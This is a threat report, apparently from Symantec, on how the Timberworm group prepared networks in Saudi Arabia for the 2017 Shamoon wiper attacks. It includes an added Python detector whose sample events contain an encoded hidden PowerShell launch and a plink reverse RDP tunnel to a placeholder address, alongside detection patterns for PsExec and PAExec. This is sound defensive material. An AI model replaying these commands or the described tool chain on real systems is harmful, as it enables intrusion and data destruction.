Recent attacks involving the destructive malware Shamoon (W32.Disttrack.B) were launched by attackers conducting a much wider campaign in the Middle East. While the attackers have compromised multiple targets in the region, only selected targets in Saudi Arabia were infected with Shamoon.
On February 15, publications from IBM (The Full Shamoon) and Palo Alto (Magic Hound) separately discussed a persistent attack campaign operating primarily in the Middle East with links to Shamoon. This campaign was conducted by a group we identify as Timberworm. The group appears to have facilitated the third wave of destructive attacks involving Shamoon in January 2017. Timberworm operates in the Middle East and beyond. Only specific organizations affiliated with Saudi Arabia appear to have been earmarked for destructive wiping attacks.
During the January attacks, Symantec discovered a high correlation between Timberworm and the presence of Shamoon in a number of organizations in Saudi Arabia. Timberworm appears to have gained access to these organizations’ networks weeks and, in some cases, months before the Shamoon attacks occurred. Once on the network, the attackers' primary goal appeared to be similar to Greenbug (an actor previously discussed in relation to the November 17 wave of attacks): detailed network reconnaissance, credential harvesting, and persistent remote access.
When Timberworm had sufficient access to a number of high value organizations, Shamoon was then preconfigured with a wipe date and the necessary credentials to maximize the overall impact during a coordinated attack. This procedure is consistent with what was observed during Greenbug operations prior to the November 17 attacks, which may indicate that multiple groups are cooperating to facilitate these destructive attacks, possibly at the direction of a single entity.
Stage 1: Timberworm recon
Timberworm’s carefully planned operation saw the attackers send spear phishing emails to individuals at targeted organizations. In some cases, the emails contained Microsoft Word or Excel files as attachments. In others, the emails contained malicious links, which if clicked, downloaded similar Word or Excel files.
Computer network exploitation
Opening the document invoked PowerShell from a malicious macro, which provided the attackers with remote access to the compromised computer. Some basic reconnaissance was then performed using existing system tools to determine if the target was of interest. Once Timberworm was satisfied, it then deployed custom malware, hacktools, and software traditionally used in system/network administration. Some of the tools deployed during these attacks included:
- PsExec, a tool for executing processes on other systems from Microsoft Sysinternals
- PAExec, a free re-implementation of PsExec from Poweradmin
- Netscan, a multipurpose IPv4/IPv6 network scanner
- Samdump, a hacking tool that dumps Windows password hashes
- Mimikatz (Hacktool.Mimikatz), a hacking tool to harvest credentials
- TightVNC, an open-source remote desktop access application
- Plink, a command line network connection tool supporting encrypted communications
- Rar, an archiving utility for compressing files before exfiltration
During this phase, once the attacker appeared to have achieved the desired level of network access, Plink was executed to provide an additional avenue of remote access (for example, reverse RDP over SSH connections). This pattern of activity is also consistent with what was observed during Greenbug operations in 2016, before the eventual deployment of Shamoon.
Stage 2: Shamoon destruction
At this point the attackers configured the Shamoon payloads per organization and then coordinated the attacks on a pre-determined date. In the January 23 attacks, Symantec observed consistent usage of PAExec across numerous organizations to initially deploy W32.Disttrack.B. Once deployed, it self-propagated and wiped accessible computers across the network.
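The two stages above (an Office macro launching PowerShell, Plink reverse tunnels, and PAExec/PsExec used to push the wiper) leave a recognisable footprint in process-creation telemetry. The following is an added example, not code from Symantec or from the article, that flags that footprint in a small batch of constructed events. The pipe-separated field layout, the sample hosts, addresses and file names, and the PAExec service file-name pattern (PAExec-<pid>-<source host>.exe) are assumptions of this example; none of the values are real indicators from the attacks.

```python
"""Added example, not code from Symantec or the page: flag the tradecraft the
article describes (Office macro -> PowerShell, Plink reverse tunnels,
PAExec/PsExec service deployment) in process-creation telemetry.
Sample events are constructed; the pipe-separated field layout and the
PAExec service-name pattern are assumptions of this example."""
import ntpath
import re

# Constructed events: timestamp|host|parent image|image|command line.
# Hostnames, addresses and file names are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    "2017-01-10T08:01:12Z|WS-0123|C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"
    "|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|powershell.exe -NoP -W Hidden -Enc SQBFAFgA",
    "2017-01-10T08:05:40Z|WS-0123|C:\\Windows\\explorer.exe"
    "|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
    "2017-01-12T17:22:03Z|WS-0123|C:\\Windows\\System32\\cmd.exe"
    "|C:\\Users\\u\\AppData\\Local\\Temp\\plink.exe"
    "|plink.exe -ssh -R 3389:127.0.0.1:3389 -pw <redacted> user@203.0.113.10",
    "2017-01-23T20:00:01Z|SRV-0007|C:\\Windows\\System32\\services.exe"
    "|C:\\Windows\\PAExec-4312-WS-0123.exe|C:\\Windows\\PAExec-4312-WS-0123.exe -service",
    "2017-01-23T20:00:02Z|SRV-0007|C:\\Windows\\PAExec-4312-WS-0123.exe"
    "|C:\\Windows\\Temp\\payload.exe|payload.exe",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
HIDDEN_OR_ENCODED = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden")
# Service binaries dropped on the target by PsExec (PSEXESVC.exe) and
# PAExec (PAExec-<pid>-<source host>.exe); the PAExec pattern is an assumption.
REMOTE_EXEC_SERVICE = re.compile(r"^(psexesvc|paexec-\d+-[\w-]+)\.exe$", re.IGNORECASE)
REMOTE_EXEC_CLIENT = re.compile(r"^(psexec(64)?|paexec)\.exe$", re.IGNORECASE)
# Plink's -R <listen-port>:<host>:<port> remote port forward.
PLINK_REMOTE_FWD = re.compile(r"(?:^|\s)-R\s+(\S+)")


def parse_event(line):
    """Split one pipe-separated record; image names become lower-cased basenames."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host,
            "parent": ntpath.basename(parent).lower(),
            "image": ntpath.basename(image).lower(),
            "cmdline": cmdline}


def detect(ev):
    """Return the rule names the event triggers (possibly several)."""
    hits = []
    cl = ev["cmdline"].lower()
    # Stage 1: a macro launching PowerShell from an Office process.
    if ev["parent"] in OFFICE_PARENTS and ev["image"] == "powershell.exe":
        hits.append("office_macro_powershell")
        if any(flag in cl for flag in HIDDEN_OR_ENCODED):
            hits.append("powershell_hidden_or_encoded")
    # Stage 1: Plink remote port forward; a forward ending in :3389 exposes RDP.
    if ev["image"] == "plink.exe":
        m = PLINK_REMOTE_FWD.search(ev["cmdline"])
        if m:
            hits.append("plink_reverse_tunnel")
            if m.group(1).split(":")[-1] == "3389":
                hits.append("reverse_rdp_over_ssh")
    # Stage 2: PsExec/PAExec service on the target, and whatever it spawns.
    if REMOTE_EXEC_CLIENT.match(ev["image"]):
        hits.append("remote_exec_client")
    if REMOTE_EXEC_SERVICE.match(ev["image"]):
        hits.append("remote_exec_service")
    if REMOTE_EXEC_SERVICE.match(ev["parent"]):
        hits.append("remote_exec_child")
    return hits


def paexec_source_host(image_name):
    """Recover the host that ran the PAExec client from the service file name."""
    m = re.match(r"^paexec-\d+-([\w-]+)\.exe$", image_name, re.IGNORECASE)
    return m.group(1).upper() if m else None


def scan(lines):
    """Run every rule over every event; returns (timestamp, host, rule) tuples."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule in detect(ev):
            findings.append((ev["ts"], ev["host"], rule))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(*finding)
```

The useful pivot is the last rule pair: the PAExec service name on the wiped server embeds the workstation that ran the client, so a `remote_exec_service` hit on one host points straight back to the foothold machine from stage 1, which is where the weeks of reconnaissance and credential harvesting described above would have taken place.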
Multiple teams cooperating?
Timberworm appears to be a much larger operation, infiltrating a much broader range of organizations beyond those affected by the recent Shamoon attacks. Similarly, Greenbug targeted a range of organizations in the Middle East beyond those affected by Shamoon, including companies in the aviation, energy, government, investment, and education sectors. While the two groups used distinct toolsets, their targets, tactics, and procedures align very closely, and both were active in the period immediately preceding the coordinated wiping events.
“Living off the land”
The Shamoon attacks illustrate how a growing number of targeted attack groups are relying on common off-the-shelf tools to compromise targets. The Shamoon attackers managed to get access to targets’ networks using socially engineered spear-phishing emails and abusing Office macros and PowerShell to gain initial footholds. In particular, the use of PowerShell has been a popular tactic of late. Recent Symantec research found a total of 111 malware families that use the PowerShell command line. More than 95 percent of the PowerShell scripts analyzed through the BlueCoat Malware Analysis sandbox were found to be malicious.
The appeal of “living off the land” is obvious. Attackers believe malicious activity will be more difficult to detect if legitimate tools are involved and malware use is kept to a minimum. The use of legitimate tools may also serve to thwart attribution to specific actors.
Symantec and Norton products protect against Shamoon with the following detections:
Intrusion prevention system:
Indicators of compromise